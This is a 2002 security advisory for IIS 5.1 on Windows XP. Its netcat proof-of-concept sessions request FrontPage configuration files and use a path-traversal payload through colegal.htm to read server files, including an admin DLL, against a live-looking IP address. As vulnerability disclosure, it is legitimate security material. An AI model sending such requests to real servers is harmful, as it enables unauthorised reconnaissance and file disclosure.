-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 .---------------. / NtWaK0 Advisory \ +--------------------------------------------------------------------------- . : Affected : Windows XP with IIS 5.1 : Type : MULTIPLE Remote Issues : Type : Remote/ Local Security Issues : Date : 10-02-2002 : Author : NtWaK0 @ www.SafeHack.com : Credit : NtWaK0 @ www.SafeHack.com : +--------------------------------------------------------------------------- . +--------------------. Remote/Local Expoit \ +----------------------`---------------------------------------------------- . : +-----------. * * * www.SafeHack.com * * * : Disclaimer \ : +-------------`------------------------------------------------------------- . : This material is presented for informational and entertainment purposes : only, and to satisfy the curious. Any activities described in this file : which involve vandalism, theft, or any other illegal activities are : recounted from third-party conversations. I do not condone or encourage : vandalism or theft. I do not accept any liability for anything anyone : does with this information. So, don't shoot the messenger. : Remember: Use a computer in ways that ensure respect for your fellows. : : +-------. : T.O.C. \ : +---------`----------------------------------------------------------------- . : : [ Brief History . . . . . . . . . . . . . . . . . . . . . .line 40 ] : : [ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 60 ] : : [ The Solution . . . . . . . . . . . . . . . . . . . . . .line 156 ] : : +-------------. : Brief History \ : +---------------`----------------------------------------------------------- . I had the chance to play for couple of hours with IIS 5.1 on a friend Box, : thanks to Recon. While I was trying some stuff on IIS 5.1 I MANY problems : with default IIS 5.1 installation and on files installed by default. : : This one is not the same as the one reported earlier. The one reported : before had to deal with "GET /_vti_bin/shtml.dll". : A copy of it can be found at : : http://www.safehack.com/Advisory/shtmldump.txt : : +-------+ : Test OS : +-------+ : Tested on Windows XP with IIS 5.1 : : : Please continue to read for more details. : : +-----------. : The Problem \ : +-------------`------------------------------------------------------------- . : >>> 1- Issue <<< : : Identify WEB DIR installation. By sending this "GET /_vti_pvt/access.cnf" : you can identify the web installation. As we all know this is a helpfull : peace of information if someone is going to attack your web site. : : >>> Proof-Of-Concept <<< : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /_vti_pvt/access.cnf : vti_encoding:SR|utf8-nl : RealmName:LAMER : InheritPermissions:false : PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt : : Their is another security issue with this too. "InheritPermissions:false" : This will tell security inheritance of that folder. : : >>> 2- Issue <<< : >>> Proof-Of-Concept <<< : : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /_vti_pvt/botinfs.cnf : : vti_encoding:SR|utf8-nl : D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\ : 40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar : : >>> 3- Issue <<< : : >>> Proof-Of-Concept <<< : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /_vti_pvt/bots.cnf : vti_encoding:SR|utf8-nl : vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared : \\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf : vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft : \\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar : \\\\fp4Avnb.dll : : >>> 4- Issue <<< : Using GET /iishelp/common/colegal.htm you can access other files. under the : web structure. I did not have chance to test it on file above the : web structure. Like I said I do not run IIS 5.1 but a friend does. : One of these days I am going to buy more memory for some of my old box and : slap on it IIS 5.1 to be able to do better test. : : >>> Proof-Of-Concept <<< : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf : vti_encoding:SR|utf8-nl : RealmName:LAMER : InheritPermissions:false : PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt : : writeto.cnf [Extracted From] : http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/ : prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp : : Back links for files that can be written to by users of the web, such as : Save Results Form handler result files. Files that can be written to by : users of the web have a looser security setting than regular web content. : : : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll : MZÉ ? ? + @a ??¦? ¦ -!+?L-!This program cannot be run in DOS mode. : $ §-Q+Q¦?ïQ¦?ïQ¦?ï3¼,ïU¦?寮5ïT¦?ïQ¦>ïF¦?ïT¦9ïP¦?寮4ïS¦?寮;ïU¦?ïRichQ¦?ï : PE L?? _; a ?!??? ? 0 c? ? µg ? ? ? ? : P ? ¿- ? ? ? ? ? ? ? » (? P 0 P? : : : : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /_vti_pvt/linkinfo.cnf : vti_encoding:SR|utf8-nl : javascript\:loadhelpfront();:localstart.asp : javascript\:activate(<%=iver%>);:localstart.asp : http\://www.safehack.com:index.htm : /iishelp/common/colegal.htm:localstart.asp : : : : NOTE: A search on google for "writeto.cnf" Returned alarmed results : http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta= : : : +------------. : The Solution \ : +--------------`------------------------------------------------------------ . No idea. Vendor was informed. : If you are going to use the founded issues, credit must be given to the : author. NtWaK0 @ www.safehack.com : +--------------------------------------------------------------------------- . -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV w0aAHeJqCi7MoCs62m5AR8dm =u7kB -----END PGP SIGNATURE----- ________________________________________________________________________ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. ____________________________________________________________.___________ Live Well Do Good www.SafeHack.com | Je Pense, Donc Je Suis \(|)/ I know I ain't perfect, but i'm 99 point 9 percent :) --(")-- RFCs are meant to be read and followed…:) /`\ NtWaK0 ________________________________________________________________________ Connect yourself to the main computer and let me take you to a cybernetic ride. Are you connected to the right cybernet? If you are, finally you are connected to my brain. ________________________________________________________________________ -=- Use a computer in a ways that ensure respect for your fellow -=-